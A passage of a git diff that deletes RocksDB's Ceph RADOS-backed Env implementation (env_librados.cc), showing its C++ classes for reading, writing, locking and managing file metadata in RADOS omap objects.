-  fprintf(stderr, "SKIPPED as JSONDocument is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/env_librados.cc b/thirdparty/rocksdb/utilities/env_librados.cc
deleted file mode 100644
index 4a0b262..0000000
--- a/thirdparty/rocksdb/utilities/env_librados.cc
+++ /dev/null
@@ -1,1488 +0,0 @@
-// -*- mode:C++; tab-width:8; c-basic-offset:2; indent-tabs-mode:t -*-
-// vim: ts=8 sw=2 smarttab
-
-#include "rocksdb/utilities/env_librados.h"
-#include "util/random.h"
-#include <mutex>
-#include <cstdlib>
-
-namespace rocksdb {
-/* GLOBAL DIFINE */
-// #define DEBUG
-#ifdef DEBUG
-#include <cstdio>
-#include <sys/syscall.h>
-#include <unistd.h>
-#define LOG_DEBUG(...)  do{\
-    printf("[%ld:%s:%i:%s]", syscall(SYS_gettid), __FILE__, __LINE__, __FUNCTION__);\
-    printf(__VA_ARGS__);\
-  }while(0)
-#else
-#define LOG_DEBUG(...)
-#endif
-
-/* GLOBAL CONSTANT */
-const char *default_db_name     = "default_envlibrados_db";
-const char *default_pool_name   = "default_envlibrados_pool";
-const char *default_config_path = "CEPH_CONFIG_PATH";           // the env variable name of ceph configure file
-// maximum dir/file that can store in the fs
-const int MAX_ITEMS_IN_FS = 1 << 30;
-// root dir tag
-const std::string ROOT_DIR_KEY = "/";
-const std::string DIR_ID_VALUE = "<DIR>";
-
-/**
- * @brief convert error code to status
- * @details Convert internal linux error code to Status
- *
- * @param r [description]
- * @return [description]
- */
-Status err_to_status(int r)
-{
-  switch (r) {
-  case 0:
-    return Status::OK();
-  case -ENOENT:
-    return Status::IOError();
-  case -ENODATA:
-  case -ENOTDIR:
-    return Status::NotFound(Status::kNone);
-  case -EINVAL:
-    return Status::InvalidArgument(Status::kNone);
-  case -EIO:
-    return Status::IOError(Status::kNone);
-  default:
-    // FIXME :(
-    assert(0 == "unrecognized error code");
-    return Status::NotSupported(Status::kNone);
-  }
-}
-
-/**
- * @brief split file path into dir path and file name
- * @details
- * Because rocksdb only need a 2-level structure (dir/file), all input path will be shortened to dir/file format
- *  For example:
- *    b/c => dir '/b', file 'c'
- *    /a/b/c => dir '/b', file 'c'
- *
- * @param fn [description]
- * @param dir [description]
- * @param file [description]
- */
-void split(const std::string &fn, std::string *dir, std::string *file) {
-  LOG_DEBUG("[IN]%s\n", fn.c_str());
-  int pos = fn.size() - 1;
-  while ('/' == fn[pos]) --pos;
-  size_t fstart = fn.rfind('/', pos);
-  *file = fn.substr(fstart + 1, pos - fstart);
-
-  pos = fstart;
-  while (pos >= 0 && '/' == fn[pos]) --pos;
-
-  if (pos < 0) {
-    *dir = "/";
-  } else {
-    size_t dstart = fn.rfind('/', pos);
-    *dir = fn.substr(dstart + 1, pos - dstart);
-    *dir = std::string("/") + *dir;
-  }
-
-  LOG_DEBUG("[OUT]%s | %s\n", dir->c_str(), file->c_str());
-}
-
-// A file abstraction for reading sequentially through a file
-class LibradosSequentialFile : public SequentialFile {
-  librados::IoCtx * _io_ctx;
-  std::string _fid;
-  std::string _hint;
-  int _offset;
-public:
-  LibradosSequentialFile(librados::IoCtx * io_ctx, std::string fid, std::string hint):
-    _io_ctx(io_ctx), _fid(fid), _hint(hint), _offset(0) {}
-
-  ~LibradosSequentialFile() {}
-
-  /**
-   * @brief read file
-   * @details
-   *  Read up to "n" bytes from the file.  "scratch[0..n-1]" may be
-   *  written by this routine.  Sets "*result" to the data that was
-   *  read (including if fewer than "n" bytes were successfully read).
-   *  May set "*result" to point at data in "scratch[0..n-1]", so
-   *  "scratch[0..n-1]" must be live when "*result" is used.
-   *  If an error was encountered, returns a non-OK status.
-   *
-   *  REQUIRES: External synchronization
-   *
-   * @param n [description]
-   * @param result [description]
-   * @param scratch [description]
-   * @return [description]
-   */
-  Status Read(size_t n, Slice* result, char* scratch) {
-    LOG_DEBUG("[IN]%i\n", (int)n);
-    librados::bufferlist buffer;
-    Status s;
-    int r = _io_ctx->read(_fid, buffer, n, _offset);
-    if (r >= 0) {
-      buffer.copy(0, r, scratch);
-      *result = Slice(scratch, r);
-      _offset += r;
-      s = Status::OK();
-    } else {
-      s = err_to_status(r);
-      if (s == Status::IOError()) {
-        *result = Slice();
-        s = Status::OK();
-      }
-    }
-    LOG_DEBUG("[OUT]%s, %i, %s\n", s.ToString().c_str(), (int)r, buffer.c_str());
-    return s;
-  }
-
-  /**
-   * @brief skip "n" bytes from the file
-   * @details
-   *  Skip "n" bytes from the file. This is guaranteed to be no
-   *  slower that reading the same data, but may be faster.
-   *
-   *  If end of file is reached, skipping will stop at the end of the
-   *  file, and Skip will return OK.
-   *
-   *  REQUIRES: External synchronization
-   *
-   * @param n [description]
-   * @return [description]
-   */
-  Status Skip(uint64_t n) {
-    _offset += n;
-    return Status::OK();
-  }
-
-  /**
-   * @brief noop
-   * @details
-   *  rocksdb has it's own caching capabilities that we should be able to use,
-   *  without relying on a cache here. This can safely be a no-op.
-   *
-   * @param offset [description]
-   * @param length [description]
-   *
-   * @return [description]
-   */
-  Status InvalidateCache(size_t offset, size_t length) {
-    return Status::OK();
-  }
-};
-
-// A file abstraction for randomly reading the contents of a file.
-class LibradosRandomAccessFile : public RandomAccessFile {
-  librados::IoCtx * _io_ctx;
-  std::string _fid;
-  std::string _hint;
-public:
-  LibradosRandomAccessFile(librados::IoCtx * io_ctx, std::string fid, std::string hint):
-    _io_ctx(io_ctx), _fid(fid), _hint(hint) {}
-
-  ~LibradosRandomAccessFile() {}
-
-  /**
-   * @brief read file
-   * @details similar to LibradosSequentialFile::Read
-   *
-   * @param offset [description]
-   * @param n [description]
-   * @param result [description]
-   * @param scratch [description]
-   * @return [description]
-   */
-  Status Read(uint64_t offset, size_t n, Slice* result,
-              char* scratch) const {
-    LOG_DEBUG("[IN]%i\n", (int)n);
-    librados::bufferlist buffer;
-    Status s;
-    int r = _io_ctx->read(_fid, buffer, n, offset);
-    if (r >= 0) {
-      buffer.copy(0, r, scratch);
-      *result = Slice(scratch, r);
-      s = Status::OK();
-    } else {
-      s = err_to_status(r);
-      if (s == Status::IOError()) {
-        *result = Slice();
-        s = Status::OK();
-      }
-    }
-    LOG_DEBUG("[OUT]%s, %i, %s\n", s.ToString().c_str(), (int)r, buffer.c_str());
-    return s;
-  }
-
-  /**
-   * @brief [brief description]
-   * @details Get unique id for each file and guarantee this id is different for each file
-   *
-   * @param id [description]
-   * @param max_size max size of id, it shoud be larger than 16
-   *
-   * @return [description]
-   */
-  size_t GetUniqueId(char* id, size_t max_size) const {
-    // All fid has the same db_id prefix, so we need to ignore db_id prefix
-    size_t s = std::min(max_size, _fid.size());
-    strncpy(id, _fid.c_str() + (_fid.size() - s), s);
-    id[s - 1] = '\0';
-    return s;
-  };
-
-  //enum AccessPattern { NORMAL, RANDOM, SEQUENTIAL, WILLNEED, DONTNEED };
-  void Hint(AccessPattern pattern) {
-    /* Do nothing */
-  }
-
-  /**
-   * @brief noop
-   * @details [long description]
-   *
-   * @param offset [description]
-   * @param length [description]
-   *
-   * @return [description]
-   */
-  Status InvalidateCache(size_t offset, size_t length) {
-    return Status::OK();
-  }
-};
-
-
-// A file abstraction for sequential writing.  The implementation
-// must provide buffering since callers may append small fragments
-// at a time to the file.
-class LibradosWritableFile : public WritableFile {
-  librados::IoCtx * _io_ctx;
-  std::string _fid;
-  std::string _hint;
-  const EnvLibrados * const _env;
-
-  std::mutex _mutex;                 // used to protect modification of all following variables
-  librados::bufferlist _buffer;      // write buffer
-  uint64_t _buffer_size;             // write buffer size
-  uint64_t _file_size;               // this file size doesn't include buffer size
-
-  /**
-   * @brief assuming caller holds lock
-   * @details [long description]
-   * @return [description]
-   */
-  int _SyncLocked() {
-    // 1. sync append data to RADOS
-    int r = _io_ctx->append(_fid, _buffer, _buffer_size);
-    assert(r >= 0);
-
-    // 2. update local variables
-    if (0 == r) {
-      _buffer.clear();
-      _file_size += _buffer_size;
-      _buffer_size = 0;
-    }
-
-    return r;
-  }
-
-public:
-  LibradosWritableFile(librados::IoCtx * io_ctx,
-                       std::string fid,
-                       std::string hint,
-                       const EnvLibrados * const env)
-    : _io_ctx(io_ctx), _fid(fid), _hint(hint), _env(env), _buffer(), _buffer_size(0), _file_size(0) {
-    int ret = _io_ctx->stat(_fid, &_file_size, nullptr);
-
-    // if file not exist
-    if (ret < 0) {
-      _file_size = 0;
-    }
-  }
-
-  ~LibradosWritableFile() {
-    // sync before closeing writable file
-    Sync();
-  }
-
-  /**
-   * @brief append data to file
-   * @details
-   *  Append will save all written data in buffer util buffer size
-   *  reaches buffer max size. Then, it will write buffer into rados
-   *
-   * @param data [description]
-   * @return [description]
-   */
-  Status Append(const Slice& data) {
-    // append buffer
-    LOG_DEBUG("[IN] %i | %s\n", (int)data.size(), data.data());
-    int r = 0;
-
-    std::lock_guard<std::mutex> lock(_mutex);
-    _buffer.append(data.data(), data.size());
-    _buffer_size += data.size();
-
-    if (_buffer_size > _env->_write_buffer_size) {
-      r = _SyncLocked();
-    }
-
-    LOG_DEBUG("[OUT] %i\n", r);
-    return err_to_status(r);
-  }
-
-  /**
-   * @brief not supported
-   * @details [long description]
-   * @return [description]
-   */
-  Status PositionedAppend(
-    const Slice& /* data */,
-    uint64_t /* offset */) {
-    return Status::NotSupported();
-  }
-
-  /**
-   * @brief truncate file to assigned size
-   * @details [long description]
-   *
-   * @param size [description]
-   * @return [description]
-   */
-  Status Truncate(uint64_t size) {
-    LOG_DEBUG("[IN]%lld|%lld|%lld\n", (long long)size, (long long)_file_size, (long long)_buffer_size);
-    int r = 0;
-
-    std::lock_guard<std::mutex> lock(_mutex);
-    if (_file_size > size) {
-      r = _io_ctx->trunc(_fid, size);
-
-      if (r == 0) {
-        _buffer.clear();
-        _buffer_size = 0;
-        _file_size = size;
-      }
-    } else if (_file_size == size) {
-      _buffer.clear();
-      _buffer_size = 0;
-    } else {
-      librados::bufferlist tmp;
-      tmp.claim(_buffer);
-      _buffer.substr_of(tmp, 0, size - _file_size);
-      _buffer_size = size - _file_size;
-    }
-
-    LOG_DEBUG("[OUT] %i\n", r);
-    return err_to_status(r);
-  }
-
-  /**
-   * @brief close file
-   * @details [long description]
-   * @return [description]
-   */
-  Status Close() {
-    LOG_DEBUG("%s | %lld | %lld\n", _hint.c_str(), (long long)_buffer_size, (long long)_file_size);
-    return Sync();
-  }
-
-  /**
-   * @brief flush file,
-   * @details initiate an aio write and not wait
-   *
-   * @return [description]
-   */
-  Status Flush() {
-    librados::AioCompletion *write_completion = librados::Rados::aio_create_completion();
-    int r = 0;
-
-    std::lock_guard<std::mutex> lock(_mutex);
-    r = _io_ctx->aio_append(_fid, write_completion, _buffer, _buffer_size);
-
-    if (0 == r) {
-      _file_size += _buffer_size;
-      _buffer.clear();
-      _buffer_size = 0;
-    }
-
-    write_completion->release();
-
-    return err_to_status(r);
-  }
-
-  /**
-   * @brief write buffer data to rados
-   * @details initiate an aio write and wait for result
-   * @return [description]
-   */
-  Status Sync() { // sync data
-    int r = 0;
-
-    std::lock_guard<std::mutex> lock(_mutex);
-    if (_buffer_size > 0) {
-      r = _SyncLocked();
-    }
-
-    return err_to_status(r);
-  }
-
-  /**
-   * @brief [brief description]
-   * @details [long description]
-   * @return true if Sync() and Fsync() are safe to call concurrently with Append()and Flush().
-   */
-  bool IsSyncThreadSafe() const {
-    return true;
-  }
-
-  /**
-   * @brief Indicates the upper layers if the current WritableFile implementation uses direct IO.
-   * @details [long description]
-   * @return [description]
-   */
-  bool use_direct_io() const {
-    return false;
-  }
-
-  /**
-   * @brief Get file size
-   * @details
-   *  This API will use cached file_size.
-   * @return [description]
-   */
-  uint64_t GetFileSize() {
-    LOG_DEBUG("%lld|%lld\n", (long long)_buffer_size, (long long)_file_size);
-
-    std::lock_guard<std::mutex> lock(_mutex);
-    int file_size = _file_size + _buffer_size;
-
-    return file_size;
-  }
-
-  /**
-   * @brief For documentation, refer to RandomAccessFile::GetUniqueId()
-   * @details [long description]
-   *
-   * @param id [description]
-   * @param max_size [description]
-   *
-   * @return [description]
-   */
-  size_t GetUniqueId(char* id, size_t max_size) const {
-    // All fid has the same db_id prefix, so we need to ignore db_id prefix
-    size_t s = std::min(max_size, _fid.size());
-    strncpy(id, _fid.c_str() + (_fid.size() - s), s);
-    id[s - 1] = '\0';
-    return s;
-  }
-
-  /**
-   * @brief noop
-   * @details [long description]
-   *
-   * @param offset [description]
-   * @param length [description]
-   *
-   * @return [description]
-   */
-  Status InvalidateCache(size_t offset, size_t length) {
-    return Status::OK();
-  }
-
-  using WritableFile::RangeSync;
-  /**
-   * @brief No RangeSync support, just call Sync()
-   * @details [long description]
-   *
-   * @param offset [description]
-   * @param nbytes [description]
-   *
-   * @return [description]
-   */
-  Status RangeSync(off_t offset, off_t nbytes) {
-    return Sync();
-  }
-
-protected:
-  using WritableFile::Allocate;
-  /**
-   * @brief noop
-   * @details [long description]
-   *
-   * @param offset [description]
-   * @param len [description]
-   *
-   * @return [description]
-   */
-  Status Allocate(off_t offset, off_t len) {
-    return Status::OK();
-  }
-};
-
-
-// Directory object represents collection of files and implements
-// filesystem operations that can be executed on directories.
-class LibradosDirectory : public Directory {
-  librados::IoCtx * _io_ctx;
-  std::string _fid;
-public:
-  explicit LibradosDirectory(librados::IoCtx * io_ctx, std::string fid):
-    _io_ctx(io_ctx), _fid(fid) {}
-
-  // Fsync directory. Can be called concurrently from multiple threads.
-  Status Fsync() {
-    return Status::OK();
-  }
-};
-
-// Identifies a locked file.
-// This is exclusive lock and can't nested lock by same thread
-class LibradosFileLock : public FileLock {
-  librados::IoCtx * _io_ctx;
-  const std::string _obj_name;
-  const std::string _lock_name;
-  const std::string _cookie;
-  int lock_state;
-public:
-  LibradosFileLock(
-    librados::IoCtx * io_ctx,
-    const std::string obj_name):
-    _io_ctx(io_ctx),
-    _obj_name(obj_name),
-    _lock_name("lock_name"),
-    _cookie("cookie") {
-
-    // TODO: the lock will never expire. It may cause problem if the process crash or abnormally exit.
-    while (!_io_ctx->lock_exclusive(
-             _obj_name,
-             _lock_name,
-             _cookie,
-             "description", nullptr, 0));
-  }
-
-  ~LibradosFileLock() {
-    _io_ctx->unlock(_obj_name, _lock_name, _cookie);
-  }
-};
-
-
-// --------------------
-// --- EnvLibrados ----
-// --------------------
-/**
- * @brief EnvLibrados ctor
- * @details [long description]
- *
- * @param db_name unique database name
- * @param config_path the configure file path for rados
- */
-EnvLibrados::EnvLibrados(const std::string& db_name,
-                         const std::string& config_path,
-                         const std::string& db_pool)
-  : EnvLibrados("client.admin",
-                "ceph",
-                0,
-                db_name,
-                config_path,
-                db_pool,
-                "/wal",
-                db_pool,
-                1 << 20) {}
-
-/**
- * @brief EnvLibrados ctor
- * @details [long description]
- *
- * @param client_name       first 3 parameters is for RADOS client init
- * @param cluster_name
- * @param flags
- * @param db_name           unique database name, used as db_id key
- * @param config_path the   configure file path for rados
- * @param db_pool the pool  for db data
- * @param wal_pool the pool for WAL data
- * @param write_buffer_size WritableFile buffer max size
- */
-EnvLibrados::EnvLibrados(const std::string& client_name,
-                         const std::string& cluster_name,
-                         const uint64_t flags,
-                         const std::string& db_name,
-                         const std::string& config_path,
-                         const std::string& db_pool,
-                         const std::string& wal_dir,
-                         const std::string& wal_pool,
-                         const uint64_t write_buffer_size)
-  : EnvWrapper(Env::Default()),
-    _client_name(client_name),
-    _cluster_name(cluster_name),
-    _flags(flags),
-    _db_name(db_name),
-    _config_path(config_path),
-    _db_pool_name(db_pool),
-    _wal_dir(wal_dir),
-    _wal_pool_name(wal_pool),
-    _write_buffer_size(write_buffer_size) {
-  int ret = 0;
-
-  // 1. create a Rados object and initialize it
-  ret = _rados.init2(_client_name.c_str(), _cluster_name.c_str(), _flags); // just use the client.admin keyring
-  if (ret < 0) { // let's handle any error that might have come back
-    std::cerr << "couldn't initialize rados! error " << ret << std::endl;
-    ret = EXIT_FAILURE;
-    goto out;
-  }
-
-  // 2. read configure file
-  ret = _rados.conf_read_file(_config_path.c_str());
-  if (ret < 0) {
-    // This could fail if the config file is malformed, but it'd be hard.
-    std::cerr << "failed to parse config file " << _config_path
-              << "! error" << ret << std::endl;
-    ret = EXIT_FAILURE;
-    goto out;
-  }
-
-  // 3. we actually connect to the cluster
-  ret = _rados.connect();
-  if (ret < 0) {
-    std::cerr << "couldn't connect to cluster! error " << ret << std::endl;
-    ret = EXIT_FAILURE;
-    goto out;
-  }
-
-  // 4. create db_pool if not exist
-  ret = _rados.pool_create(_db_pool_name.c_str());
-  if (ret < 0 && ret != -EEXIST && ret !=  -EPERM) {
-    std::cerr << "couldn't create pool! error " << ret << std::endl;
-    goto out;
-  }
-
-  // 5. create db_pool_ioctx
-  ret = _rados.ioctx_create(_db_pool_name.c_str(), _db_pool_ioctx);
-  if (ret < 0) {
-    std::cerr << "couldn't set up ioctx! error " << ret << std::endl;
-    ret = EXIT_FAILURE;
-    goto out;
-  }
-
-  // 6. create wal_pool if not exist
-  ret = _rados.pool_create(_wal_pool_name.c_str());
-  if (ret < 0 && ret != -EEXIST && ret !=  -EPERM) {
-    std::cerr << "couldn't create pool! error " << ret << std::endl;
-    goto out;
-  }
-
-  // 7. create wal_pool_ioctx
-  ret = _rados.ioctx_create(_wal_pool_name.c_str(), _wal_pool_ioctx);
-  if (ret < 0) {
-    std::cerr << "couldn't set up ioctx! error " << ret << std::endl;
-    ret = EXIT_FAILURE;
-    goto out;
-  }
-
-  // 8. add root dir
-  _AddFid(ROOT_DIR_KEY, DIR_ID_VALUE);
-
-out:
-  LOG_DEBUG("rados connect result code : %i\n", ret);
-}
-
-/****************************************************
-  private functions to handle fid operation.
-  Dir also have fid, but the value is DIR_ID_VALUE
-****************************************************/
-
-/**
- * @brief generate a new fid
- * @details [long description]
- * @return [description]
- */
-std::string EnvLibrados::_CreateFid() {
-  return _db_name + "." + GenerateUniqueId();
-}
-
-/**
- * @brief get fid
- * @details [long description]
- *
- * @param fname [description]
- * @param fid [description]
- *
- * @return
- *  Status::OK()
- *  Status::NotFound()
- */
-Status EnvLibrados::_GetFid(
-  const std::string &fname,
-  std::string& fid) {
-  std::set<std::string> keys;
-  std::map<std::string, librados::bufferlist> kvs;
-  keys.insert(fname);
-  int r = _db_pool_ioctx.omap_get_vals_by_keys(_db_name, keys, &kvs);
-
-  if (0 == r && 0 == kvs.size()) {
-    return Status::NotFound();
-  } else if (0 == r && 0 != kvs.size()) {
-    fid.assign(kvs[fname].c_str(), kvs[fname].length());
-    return Status::OK();
-  } else {
-    return err_to_status(r);
-  }
-}
-
-/**
- * @brief rename fid
- * @details Only modify object in rados once,
- * so this rename operation is atomic in term of rados
- *
- * @param old_fname [description]
- * @param new_fname [description]
- *
- * @return [description]
- */
-Status EnvLibrados::_RenameFid(const std::string& old_fname,
-                               const std::string& new_fname) {
-  std::string fid;
-  Status s = _GetFid(old_fname, fid);
-
-  if (Status::OK() != s) {
-    return s;
-  }
-
-  librados::bufferlist bl;
-  std::set<std::string> keys;
-  std::map<std::string, librados::bufferlist> kvs;
-  librados::ObjectWriteOperation o;
-  bl.append(fid);
-  keys.insert(old_fname);
-  kvs[new_fname] = bl;
-  o.omap_rm_keys(keys);
-  o.omap_set(kvs);
-  int r = _db_pool_ioctx.operate(_db_name, &o);
-  return err_to_status(r);
-}
-
-/**
- * @brief add <file path, fid> to metadata object. It may overwrite exist key.
- * @details [long description]
- *
- * @param fname [description]
- * @param fid [description]
- *
- * @return [description]
- */
-Status EnvLibrados::_AddFid(
-  const std::string& fname,
-  const std::string& fid) {
-  std::map<std::string, librados::bufferlist> kvs;
-  librados::bufferlist value;
-  value.append(fid);
-  kvs[fname] = value;
-  int r = _db_pool_ioctx.omap_set(_db_name, kvs);
-  return err_to_status(r);
-}
-
-/**
- * @brief return subfile names of dir.
- * @details
- *  RocksDB has a 2-level structure, so all keys
- *  that have dir as prefix are subfiles of dir.
- *  So we can just return these files' name.
- *
- * @param dir [description]
- * @param result [description]
- *
- * @return [description]
- */
-Status EnvLibrados::_GetSubFnames(
-  const std::string& dir,
-  std::vector<std::string> * result
-) {
-  std::string start_after(dir);
-  std::string filter_prefix(dir);
-  std::map<std::string, librados::bufferlist> kvs;
-  _db_pool_ioctx.omap_get_vals(_db_name,
-                               start_after, filter_prefix,
-                               MAX_ITEMS_IN_FS, &kvs);
-
-  result->clear();
-  for (auto i = kvs.begin(); i != kvs.end(); i++) {
-    result->push_back(i->first.substr(dir.size() + 1));
-  }
-  return Status::OK();
-}
-
-/**
- * @brief delete key fname from metadata object
- * @details [long description]
- *
- * @param fname [description]
- * @return [description]
- */
-Status EnvLibrados::_DelFid(
-  const std::string& fname) {
-  std::set<std::string> keys;
-  keys.insert(fname);
-  int r = _db_pool_ioctx.omap_rm_keys(_db_name, keys);
-  return err_to_status(r);
-}
-
-/**
- * @brief get match IoCtx from _prefix_pool_map
- * @details [long description]
- *
- * @param prefix [description]
- * @return [description]
- *
- */
-librados::IoCtx* EnvLibrados::_GetIoctx(const std::string& fpath) {
-  auto is_prefix = [](const std::string & s1, const std::string & s2) {
-    auto it1 = s1.begin(), it2 = s2.begin();
-    while (it1 != s1.end() && it2 != s2.end() && *it1 == *it2) ++it1, ++it2;
-    return it1 == s1.end();
-  };
-
-  if (is_prefix(_wal_dir, fpath)) {
-    return &_wal_pool_ioctx;
-  } else {
-    return &_db_pool_ioctx;
-  }
-}
-
-/************************************************************
-                public functions
-************************************************************/
-/**
- * @brief generate unique id
- * @details Combine system time and random number.
- * @return [description]
- */
-std::string EnvLibrados::GenerateUniqueId() {
-  Random64 r(time(nullptr));
-  uint64_t random_uuid_portion =
-    r.Uniform(std::numeric_limits<uint64_t>::max());
-  uint64_t nanos_uuid_portion = NowNanos();
-  char uuid2[200];
-  snprintf(uuid2,
-           200,
-           "%16lx-%16lx",
-           (unsigned long)nanos_uuid_portion,
-           (unsigned long)random_uuid_portion);
-  return uuid2;
-}
-
-/**
- * @brief create a new sequential read file handler
- * @details it will check the existence of fname
- *
- * @param fname [description]
- * @param result [description]
- * @param options [description]
- * @return [description]
- */
-Status EnvLibrados::NewSequentialFile(
-  const std::string& fname,
-  std::unique_ptr<SequentialFile>* result,
-  const EnvOptions& options)
-{
-  LOG_DEBUG("[IN]%s\n", fname.c_str());
-  std::string dir, file, fid;
-  split(fname, &dir, &file);
-  Status s;
-  std::string fpath = dir + "/" + file;
-  do {
-    s = _GetFid(dir, fid);
-
-    if (!s.ok() || fid != DIR_ID_VALUE) {
-      if (fid != DIR_ID_VALUE) s = Status::IOError();
-      break;
-    }
-
-    s = _GetFid(fpath, fid);
-
-    if (Status::NotFound() == s) {
-      s = Status::IOError();
-      errno = ENOENT;
-      break;
-    }
-
-    result->reset(new LibradosSequentialFile(_GetIoctx(fpath), fid, fpath));
-    s = Status::OK();
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief create a new random access file handler
- * @details it will check the existence of fname
- *
- * @param fname [description]
- * @param result [description]
- * @param options [description]
- * @return [description]
- */
-Status EnvLibrados::NewRandomAccessFile(
-  const std::string& fname,
-  std::unique_ptr<RandomAccessFile>* result,
-  const EnvOptions& options)
-{
-  LOG_DEBUG("[IN]%s\n", fname.c_str());
-  std::string dir, file, fid;
-  split(fname, &dir, &file);
-  Status s;
-  std::string fpath = dir + "/" + file;
-  do {
-    s = _GetFid(dir, fid);
-
-    if (!s.ok() || fid != DIR_ID_VALUE) {
-      s = Status::IOError();
-      break;
-    }
-
-    s = _GetFid(fpath, fid);
-
-    if (Status::NotFound() == s) {
-      s = Status::IOError();
-      errno = ENOENT;
-      break;
-    }
-
-    result->reset(new LibradosRandomAccessFile(_GetIoctx(fpath), fid, fpath));
-    s = Status::OK();
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief create a new write file handler
- * @details it will check the existence of fname
- *
- * @param fname [description]
- * @param result [description]
- * @param options [description]
- * @return [description]
- */
-Status EnvLibrados::NewWritableFile(
-  const std::string& fname,
-  std::unique_ptr<WritableFile>* result,
-  const EnvOptions& options)
-{
-  LOG_DEBUG("[IN]%s\n", fname.c_str());
-  std::string dir, file, fid;
-  split(fname, &dir, &file);
-  Status s;
-  std::string fpath = dir + "/" + file;
-
-  do {
-    // 1. check if dir exist
-    s = _GetFid(dir, fid);
-    if (!s.ok()) {
-      break;
-    }
-
-    if (fid != DIR_ID_VALUE) {
-      s = Status::IOError();
-      break;
-    }
-
-    // 2. check if file exist.
-    // 2.1 exist, use it
-    // 2.2 not exist, create it
-    s = _GetFid(fpath, fid);
-    if (Status::NotFound() == s) {
-      fid = _CreateFid();
-      _AddFid(fpath, fid);
-    }
-
-    result->reset(new LibradosWritableFile(_GetIoctx(fpath), fid, fpath, this));
-    s = Status::OK();
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief reuse write file handler
- * @details
- *  This function will rename old_fname to new_fname,
- *  then return the handler of new_fname
- *
- * @param new_fname [description]
- * @param old_fname [description]
- * @param result [description]
- * @param options [description]
- * @return [description]
- */
-Status EnvLibrados::ReuseWritableFile(
-  const std::string& new_fname,
-  const std::string& old_fname,
-  std::unique_ptr<WritableFile>* result,
-  const EnvOptions& options)
-{
-  LOG_DEBUG("[IN]%s => %s\n", old_fname.c_str(), new_fname.c_str());
-  std::string src_fid, tmp_fid, src_dir, src_file, dst_dir, dst_file;
-  split(old_fname, &src_dir, &src_file);
-  split(new_fname, &dst_dir, &dst_file);
-
-  std::string src_fpath = src_dir + "/" + src_file;
-  std::string dst_fpath = dst_dir + "/" + dst_file;
-  Status r = Status::OK();
-  do {
-    r = _RenameFid(src_fpath,
-                   dst_fpath);
-    if (!r.ok()) {
-      break;
-    }
-
-    result->reset(new LibradosWritableFile(_GetIoctx(dst_fpath), src_fid, dst_fpath, this));
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s\n", r.ToString().c_str());
-  return r;
-}
-
-/**
- * @brief create a new directory handler
- * @details [long description]
- *
- * @param name [description]
- * @param result [description]
- *
- * @return [description]
- */
-Status EnvLibrados::NewDirectory(
-  const std::string& name,
-  std::unique_ptr<Directory>* result)
-{
-  LOG_DEBUG("[IN]%s\n", name.c_str());
-  std::string fid, dir, file;
-  /* just want to get dir name */
-  split(name + "/tmp", &dir, &file);
-  Status s;
-
-  do {
-    s = _GetFid(dir, fid);
-
-    if (!s.ok() || DIR_ID_VALUE != fid) {
-      s = Status::IOError(name, strerror(-ENOENT));
-      break;
-    }
-
-    if (Status::NotFound() == s) {
-      s = _AddFid(dir, DIR_ID_VALUE);
-      if (!s.ok()) break;
-    } else if (!s.ok()) {
-      break;
-    }
-
-    result->reset(new LibradosDirectory(_GetIoctx(dir), dir));
-    s = Status::OK();
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief check if fname is exist
- * @details [long description]
- *
- * @param fname [description]
- * @return [description]
- */
-Status EnvLibrados::FileExists(const std::string& fname)
-{
-  LOG_DEBUG("[IN]%s\n", fname.c_str());
-  std::string fid, dir, file;
-  split(fname, &dir, &file);
-  Status s = _GetFid(dir + "/" + file, fid);
-
-  if (s.ok() && fid != DIR_ID_VALUE) {
-    s = Status::OK();
-  }
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief get subfile name of dir_in
- * @details [long description]
- *
- * @param dir_in [description]
- * @param result [description]
- *
- * @return [description]
- */
-Status EnvLibrados::GetChildren(
-  const std::string& dir_in,
-  std::vector<std::string>* result)
-{
-  LOG_DEBUG("[IN]%s\n", dir_in.c_str());
-  std::string fid, dir, file;
-  split(dir_in + "/temp", &dir, &file);
-  Status s;
-
-  do {
-    s = _GetFid(dir, fid);
-    if (!s.ok()) {
-      break;
-    }
-
-    if (fid != DIR_ID_VALUE) {
-      s = Status::IOError();
-      break;
-    }
-
-    s = _GetSubFnames(dir, result);
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief delete fname
- * @details [long description]
- *
- * @param fname [description]
- * @return [description]
- */
-Status EnvLibrados::DeleteFile(const std::string& fname)
-{
-  LOG_DEBUG("[IN]%s\n", fname.c_str());
-  std::string fid, dir, file;
-  split(fname, &dir, &file);
-  Status s = _GetFid(dir + "/" + file, fid);
-
-  if (s.ok() && DIR_ID_VALUE != fid) {
-    s = _DelFid(dir + "/" + file);
-  } else {
-    s = Status::NotFound();
-  }
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief create new dir
- * @details [long description]
- *
- * @param dirname [description]
- * @return [description]
- */
-Status EnvLibrados::CreateDir(const std::string& dirname)
-{
-  LOG_DEBUG("[IN]%s\n", dirname.c_str());
-  std::string fid, dir, file;
-  split(dirname + "/temp", &dir, &file);
-  Status s = _GetFid(dir + "/" + file, fid);
-
-  do {
-    if (Status::NotFound() != s && fid != DIR_ID_VALUE) {
-      break;
-    } else if (Status::OK() == s && fid == DIR_ID_VALUE) {
-      break;
-    }
-
-    s = _AddFid(dir, DIR_ID_VALUE);
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief create dir if missing
- * @details [long description]
- *
- * @param dirname [description]
- * @return [description]
- */
-Status EnvLibrados::CreateDirIfMissing(const std::string& dirname)
-{
-  LOG_DEBUG("[IN]%s\n", dirname.c_str());
-  std::string fid, dir, file;
-  split(dirname + "/temp", &dir, &file);
